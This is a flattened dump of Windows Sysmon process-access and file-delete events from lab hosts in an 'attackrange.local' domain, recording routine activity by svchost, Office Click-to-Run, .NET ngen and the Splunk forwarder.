Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.046{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.046{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-734.datMD5=D77EADE49904F3230D1175407D1F80A7,SHA256=5D8024B13D1AC4E8BF01CB53B16BCB52404B9721535955B2F49A3D66E320DFF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.046{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDC-607E-D50C-00000000BB01}1364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.030{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.030{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.014{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.999{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDC-607E-D50C-00000000BB01}1364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.999{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDC-607E-D50C-00000000BB01}1364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.999{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050282Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:32.364{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECE0FACC99E7B748BB62B4EBE98C1BA1,SHA256=0181FAA7F24F0752B5423861AD6BDE426FDCCD529F0E6A647D8E58695B209FD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050281Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:32.255{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32524477DB3027E24B0ADBF501E4E26D,SHA256=78E0F135DF02608794D7643D3E0850CA58A95D6EA201E88F7F08CB628ECC4158,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.983{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDD-607E-E30C-00000000BB01}6916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDD-607E-E20C-00000000BB01}6396C:\Program Files\Microsoft Office\root\Office16\perfboost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4c224|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4dd30|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+584fe|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+57f5f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+56e48|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923548C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDD-607E-E20C-00000000BB01}6396C:\Program Files\Microsoft Office\root\Office16\perfboost.exe0x1438C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+73c87|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+7522e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+14519|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a430|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000074977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923548C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDD-607E-E20C-00000000BB01}6396C:\Program Files\Microsoft Office\root\Office16\perfboost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+2d73e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+16070|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+15184|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+17233|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a40c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac 10341000x800000000000000074976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.952{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-E30C-00000000BB01}6916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.952{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDD-607E-E30C-00000000BB01}6916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923548C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDD-607E-E20C-00000000BB01}6396C:\Program Files\Microsoft Office\root\Office16\perfboost.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+976c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.874{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDD-607E-E10C-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.874{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-E20C-00000000BB01}6396C:\Program Files\Microsoft Office\root\Office16\perfboost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.874{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50921828C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDD-607E-E20C-00000000BB01}6396C:\Program Files\Microsoft Office\root\Office16\perfboost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+41b2ff|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4435e7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4429be|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.858{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-E10C-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.858{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDD-607E-E10C-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000074968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.858{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-walMD5=963C022EB2C8F8669FA9138BCE3231AF,SHA256=59D2BAE14829C7FC6A646B4CB6AF0E5A27160E7622084842F02436E9290210DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.858{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-shmMD5=6635525146DE08BF8FE2C9753D152339,SHA256=22B38E94102696BFC066B79BBE325D9750469E2413BCAD3CAB36318D635017B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.811{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDD-607E-E00C-00000000BB01}6784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 